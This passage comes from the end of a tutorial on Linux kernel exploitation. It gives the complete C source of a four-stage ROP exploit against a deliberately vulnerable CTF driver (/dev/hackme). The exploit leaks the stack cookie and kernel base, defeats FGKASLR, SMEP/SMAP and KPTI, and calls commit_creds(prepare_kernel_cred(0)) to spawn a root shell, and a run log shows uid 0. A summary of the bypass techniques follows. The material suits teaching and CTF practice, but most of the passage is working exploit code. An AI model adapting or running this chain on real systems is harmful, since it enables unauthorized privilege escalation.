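    payload[idx++] = st->cs;
    payload[idx++] = st->rflags;
    payload[idx++] = st->sp;
    payload[idx++] = st->ss;
    return idx;
}
```

The user_rip slot is what chains the stages together: each stage returns into a user-space function that saves rax and then starts the next stage.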

Complete Code

We will now present the complete code for the exploit that works with FGKASLR enabled.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>


char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;

// memory locations in the kernel
uint64_t kernel_base;
uint64_t ksymtab_prepare_kernel_cred;
uint64_t ksymtab_commit_creds;

uint64_t commit_creds;
uint64_t prepare_kernel_cred;

// rop gadgets
uint64_t pop_rax_ret; // pop rax; ret
uint64_t read_mem_pop1_ret; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
uint64_t pop_rdi_pop_rbx_ret; // pop rdi ; pop rbx ; ret
uint64_t swapgs_restore_regs_and_return_to_usermode; // The KPTI trampoline

// temporary return values
uint64_t tmp;
uint64_t creds_struct; // returned creds_struct from prepare_kernel_cred(0)

// for storing the registers
uint64_t user_cs, user_ss, user_rflags, user_sp;


void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

/*
First, we leak the cookie and the base address of the kernel.
This allows us to compute the memory locations of the relevant gadgets
in the section that is affected by KASLR, but not by FGKASLR.
*/
void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %zu bytes memory\n", sizeof(leak));
    ssize_t n = read(global_fd, leak, sizeof(leak));
    if (n < 0) {
        perror("[-] read");
        exit(-1);
    }
    cookie = leak[16];
    printf("[+] leaked cookie: 0x%lx\n", cookie);
    kernel_base = leak[38] - 0x0a157UL;
    printf("[+] leaked kernel_base 0x%lx\n", kernel_base);
    ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fcUL;
    printf("[+] leaked ksymtab_prepare_kernel_cred 0x%lx\n", ksymtab_prepare_kernel_cred);
    ksymtab_commit_creds = kernel_base + 0xf87d90UL;
    printf("[+] leaked ksymtab_commit_creds 0x%lx\n", ksymtab_commit_creds);

    pop_rax_ret = kernel_base + 0x4d11UL;
    pop_rdi_pop_rbx_ret = kernel_base + 0x745dUL;
    read_mem_pop1_ret = kernel_base + 0x4aaeUL; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
    swapgs_restore_regs_and_return_to_usermode = kernel_base + 0x200f10UL; // the offset from /proc/kallsyms
}

void stage1();
void stage2();
void stage3();
void stage4();
void get_commit_creds();

/*
The first stage computes the memory location of the symbol commit_creds
*/
void stage1(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    uint64_t cookie_off = 16;

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rax_ret;
    payload[cookie_off++] = (uint64_t) ksymtab_commit_creds - 0x10;
    payload[cookie_off++] = (uint64_t) read_mem_pop1_ret;
    payload[cookie_off++] = (uint64_t) 0; // dummy pop

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) get_commit_creds;  // compute the location of commit_creds

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

void get_commit_creds(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov tmp, rax;"
        ".att_syntax;"
    );
    commit_creds = ksymtab_commit_creds + (int)tmp;
    printf("[+] leaked commit_creds 0x%lx\n", commit_creds);
    stage2();
}

/*
At the end of get_commit_creds, we enter the second stage.
This stage is similar to stage1, but computes the location of the
symbol prepare_kernel_cred.
*/

void  get_prepare_kernel_cred();

void stage2(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    uint64_t cookie_off = 16;

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rax_ret;
    payload[cookie_off++] = (uint64_t) ksymtab_prepare_kernel_cred - 0x10;
    payload[cookie_off++] = (uint64_t) read_mem_pop1_ret;
    payload[cookie_off++] = (uint64_t) 0; // dummy pop

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) get_prepare_kernel_cred;  // compute the location of prepare_kernel_cred

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

void get_prepare_kernel_cred(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov tmp, rax;"
        ".att_syntax;"
    );
    prepare_kernel_cred = ksymtab_prepare_kernel_cred + (int)tmp;
    printf("[+] leaked prepare_kernel_cred 0x%lx\n", prepare_kernel_cred);
    stage3();
}

/*
At the end of get_prepare_kernel_cred, we enter the third stage.
Remember, our ultimate goal is to call commit_creds(prepare_kernel_cred(0)).
The third stage calls prepare_kernel_cred(0). Per calling convention,
the argument needs to be loaded in rdi. Fortunately we have a gadget
for that.
*/

void return_prepare_kernel_cred();

void stage3(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    uint64_t cookie_off = 16;

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_pop_rbx_ret;
    payload[cookie_off++] = (uint64_t) 0; // RDI, initialize argument for prepare_kernel_cred
    payload[cookie_off++] = (uint64_t) 0; // RBX

    payload[cookie_off++] = (uint64_t) prepare_kernel_cred; // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) return_prepare_kernel_cred;  // return after prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");

}

void return_prepare_kernel_cred(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov tmp, rax;"
        ".att_syntax;"
    );
    creds_struct = tmp;
    printf("[+] returned creds_struct 0x%lx\n", creds_struct);
    stage4();
}

/*
Stage4 executes commit_creds on the returned creds struct of stage3.
After that, we jump to a shell.
*/

void shell();

void stage4(){
    uint8_t sz = 50;
    uint64_t payload[sz];
    uint64_t cookie_off = 16;

    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_pop_rbx_ret;
    payload[cookie_off++] = (uint64_t) creds_struct; // RDI, argument for commit_creds
    payload[cookie_off++] = (uint64_t) 0; // RBX

    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // The KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy rax
    payload[cookie_off++] = (uint64_t) 0; // dummy rdi

    payload[cookie_off++] = (uint64_t) shell;  // return after we have elevated permissions

    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");

}

void shell(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}


int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    stage1();
    return 0;
}

Executing the code looks as follows.

/ $ id
uid=1000 gid=1000 groups=1000
/ $ ./exploit_fgkaslr
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie: 0xc2f94f03356f4600
[+] leaked kernel_base 0xffffffff86e00000
[+] leaked ksymtab_prepare_kernel_cred 0xffffffff87d8d4fc
[+] leaked ksymtab_commit_creds 0xffffffff87d87d90
[+] leaked commit_creds 0xffffffff874ef630
[+] leaked prepare_kernel_cred 0xffffffff8791bd70
[+] returned creds_struct 0xffff93cd472e1780
[+] we are root (uid = 0)

Conclusion/Summary

That was a long article. Congrats if you made it this far. If you skipped some parts or forgot the start of the article, here are the most important points that should stick with you.

In general, the goal in kernel space is not to spawn a shell from shellcode directly. Instead, you want to execute commit_creds(prepare_kernel_cred(0)) and return to user space. This gives you an elevated prompt.

If you encounter SMEP (Supervisor Mode Execution Prevention) or SMAP (Supervisor Mode Access Prevention), you cannot use code from user space in kernel exploits. To bypass this, you write a ROP chain with gadgets in the kernel.

If you encounter KPTI (Kernel Page Table Isolation), there are various bypasses. The most common one is to make use of a KPTI trampoline. This is the code that syscalls execute when they go back to user space. You can find the other bypasses above in the article.

Finally, if you encounter KASLR (Kernel Address Space Layout Randomization), you need to check whether it works at the granularity of functions (FGKASLR) or whether the whole kernel is moved by a single offset. In the second case, a single kernel address leak is enough to recover all addresses. If FGKASLR is used, there are still parts of the kernel that are only moved by a single offset. Again, a kernel address leak allows you to construct ROP chains using these memory locations.

Resources

There are lots of writeups for exactly this challenge and I have read several of them, as they focus on different aspects. Some code parts are lifted from these other writeups. Without these writeups my guide could not have existed. We really stand on the shoulders of giants.


Published

17 December 2024

Introduction To Linux Kernel Exploitation Exploiting Buffer Overflows in Vulnerable Kernel Modules

Prelude

Setup

vmlinuz

initramfs.cpio.gz

run.sh

Kernel Security Mitigations

Reconnaissance

Leaking the Stack

Controlling RIP

Privilege Escalation Without Any Mitigations: Ret2Usr

Adding SMEP/SMAP

Alternative way of bypassing SMEP but not SMAP

Adding KPTI

KPTI Bypass 1: Using a Signal Handler

KPTI Bypass 2: KPTI Trampolines

KPTI Bypass 3: Abuse Modprobe

Adding KASLR

Preliminaries

Reconnaissance

Investigating the Stack

Comparing Addresses of Kernel Symbols

Leaking the Addresses of `prepare_kernel_cred` and `commit_cred`

Game Plan

Complete Code

Conclusion/Summary

Resources
